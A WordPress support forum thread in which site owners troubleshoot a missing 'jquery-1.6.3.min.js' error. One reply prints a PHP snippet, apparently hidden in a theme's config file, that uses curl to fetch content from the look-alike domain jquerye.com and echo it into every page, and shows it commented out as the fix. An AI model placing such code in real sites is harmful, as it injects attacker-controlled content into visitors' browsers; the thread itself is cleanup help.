• Hi all,

    I’m here cause I have this issue on my website (www.centreculturelremicourt.be) :

    The requested URL /jquery-1.6.3.min.js was not found on this server.

    I try the solution in header.php, but I have no “if” command in this file !

    Could someone help to resolve this issue please ?

    Thanks a lot.

Viewing 3 replies - 31 through 33 (of 33 total)
  • @stefanristicdev

    If you ever come to Golubac,drop in https://www.kafanazlatnaribica.com
    You got food and drinks at our expense!
    You saved me!
    I found code in functions-init.php and replace it with <?php ?>

    Greatings from Golubac, Serbia.

    Henry

    (@seoblogbuzz)

    jquerye.com/jquery-1.6.3.min.js (port 80) error

    1)I deactivated all the plugins and re-activated one by one, not found the culprit.
    2) I deactivated the theme, the error gone(For sure is the theme caused the error).
    3) I search jquery-1.6.3.min.js in the themes folder, no found the file. I then, opened themes folder function.php…

    I saw the line like the following:
    if(defined(‘TEMPLATEPATH’)){ include(“PPT/_config.php”); }

    So, it was located at the PPT/config.php folder.

    I opened the file with notepad and edited inside FTP, then save. SOLVED!

    I just commanded the file”

    {if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js&#8221;;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}

    to

    //{if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js&#8221;;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}

    Happy day!

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Placebo effect.

Viewing 3 replies - 31 through 33 (of 33 total)
  • The topic ‘The requested URL /jquery-1.6.3.min.js’ is closed to new replies.